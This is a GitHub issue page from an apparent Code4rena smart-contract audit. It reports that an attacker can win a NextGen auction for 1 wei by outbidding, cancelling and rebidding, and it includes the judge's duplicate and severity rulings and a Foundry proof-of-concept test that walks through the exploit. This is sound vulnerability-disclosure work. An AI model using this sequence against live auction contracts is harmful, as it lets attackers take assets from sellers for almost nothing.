-
Notifications
You must be signed in to change notification settings - Fork 3
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Attacker can manipulate the auction and win it paying just 1 wei #1513
Comments
141345 marked the issue as duplicate of #962 |
alex-ppg marked the issue as not a duplicate |
alex-ppg marked the issue as duplicate of #1784 |
alex-ppg marked the issue as selected for report |
The Warden demonstrates a way via which the 1-second time overlap of an auction's While the 1-second overlap has a low likelihood per #1323 and #175, the Warden has demonstrated a high impact whereby the auctioned NFT is captured at a very small price. The attack can be reliably carried out for auctions whose exact end time will be included in a block by bidding a high value that exceeds the auctioned item's "estimated" price thereby ensuring no other bids are placed. Additionally, the attack can also be carried out in auctions where other participants have canceled their bids, and at a minimum, this would result in the user winning the auction with the second-to-last bid's value + 1. Combining the above I consider this submission to be of a medium-risk rating yet relying on the same root cause as #1323 (cancellation of bids right at the end of an auction, albeit before the auction is claimed rather than after). Given that the remediation for either of the two would cancel the other out, I will mark this submission and its duplicates as (at maximum) 50% credit under submission #1323 duplicates. The issues that will be diminished in their reward are: #1513, #1910, #1867, #1819, #1811, #1797, #1784, #1754, #1716, #1612, #1583, #1561, #1515, #1420, #1413, #1379, #1321, #1263, #1251, #1249, #1245, #1241, #1197, #1179, #1176, #1146, #1107, #1011, #924, #898, #848, #819, #791, #789, #777, #733, #692, #680, #655, #652, #630, #616, #567, #533, #490, #413, #403, #315, #209, #190, #148, #125, #65, #53 |
alex-ppg marked the issue as duplicate of #1323 |
alex-ppg marked the issue as satisfactory |
alex-ppg marked the issue as partial-50 |
alex-ppg marked the issue as not selected for report |
alex-ppg marked the issue as satisfactory |
alex-ppg marked the issue as partial-50 |
Hey @alex-ppg, I think #1513 isn't simply a duplicate of #1323. Fixing #1323 won't address #1513. While it makes the attack more challenging, it doesn't eliminate the risk. The attacker can still outbid competitors, cancel the bid at the last second, and place a 1 wei bid. They can then wait for the auction to end, claiming the NFT just one block later. While some may argue that there is a possibility of being frontrun or outbid in the last block, what if that doesn't happen? The attacker can simply wait for another second and claim the NFT. Here is a coded PoC: function testWinAuctionWith1Wei() public {
vm.prank(genAdminOwner);
minterContract.mintAndAuction({
_recipient: artist1,
_tokenData: "",
_saltfun_o: 0,
_collectionID: 1,
_auctionEndTime: block.timestamp + 1 days
});
vm.prank(artist1);
nextGenCore.approve(address(auctionDemo), 10000000000);
// Assume the NFT price is 1 ETH in the open market
// When the NFT auction started, the attacker will bid with 10 ETH to eliminate the compitition
hoax(bidder1, 10e18);
auctionDemo.participateToAuction{value: 10e18}(10000000000);
console.log(
"Attacker 10 ETH bid to eliminate compitition:",
auctionDemo.returnHighestBid(10000000000)
);
vm.warp(block.timestamp + 1 days);
// Attacker will wait to the last second to execute all this transaction's simultaneously
vm.startPrank(bidder1);
auctionDemo.cancelBid(10000000000, 0);
auctionDemo.participateToAuction{value: 1 wei}(10000000000);
console.log(
"Attacker 1 Wei bid :",
auctionDemo.returnHighestBid(10000000000)
);
vm.stopPrank();
vm.roll(block.number + 1);
vm.prank(bidder1);
auctionDemo.claimAuction(10000000000);
console.log(
"Auction contract balance after the claim :",
address(auctionDemo).balance
);
console.log(
"Owner balance after the claim :",
auctionDemo.owner().balance
);
console.log(
"Attacker successfully claimed the NFT :",
nextGenCore.ownerOf(10000000000)
);
} #1513 describe a diffrent attack with a diffrent root cause. AuctionDemo should prevent users from canceling bids during an ongoing auction. In the initial report, I might have incorrectly applied it was only possible when |
Hey @0xbtk, thanks for contributing to the PJQA process! I have already provided some feedback concerning this on #663 (comment). The attackers would open themselves up to a front-run attack that is very lucrative and trivial to execute. The problem with this attack and its reliance on The attack itself already relies on a couple of hypotheticals, including:
If we add |
Hey @alex-ppg, thanks for your time. As mentioned earlier, the risk of being front-run or outbid in the final block exists. Attackers can utilize flashbots or a private mempool to submit transactions. While I understand bid cancellation is intentional, I have highlighted that the current design is can be manipulated by attackers. Isn't this attack has a higher probability and more severe impact compared to #175? |
Hey @0xbtk, thanks for following up! This submission has been credited 50% of a high-severity submission while the issue you mention is a medium-severity submission. Specifically, this submission has been rewarded Please let me know if there is anything else you wish to discuss further. |
Lines of code
https://github.com/code-423n4/2023-10-nextgen/blob/main/smart-contracts/AuctionDemo.sol#L124-L143
Vulnerability details
Impact
Attacker can outbid competitors by initially bidding significantly more than the market value of the NFT. Wait for the last second, cancels the high bid right before the auction ends, places a 1 Wei bid and successfully claims the NFT in the same transaction.
Note
Cost of Attack: Minimal, limited to gas fees. The attacker can repeatedly execute this strategy across auctions if someone outbided him, as he can just cancel his bid.
Proof of Concept
A simple scenario breakdown of the attack:
participateToAuction()
function.claimAuction()
function, claiming the NFT with the 1 Wei bid (In the same tx).Here is a coded PoC to demonstrate the issue:
Logs result:
Test Setup:
NextGenSecurityReview
forge test --mt testWinAuctionWith1Wei -vvv
Tools Used
Manual review
Recommended Mitigation Steps
Disallow bid's cancellation while the auction is active to prevent this exploit.
Assessed type
Other
The text was updated successfully, but these errors were encountered: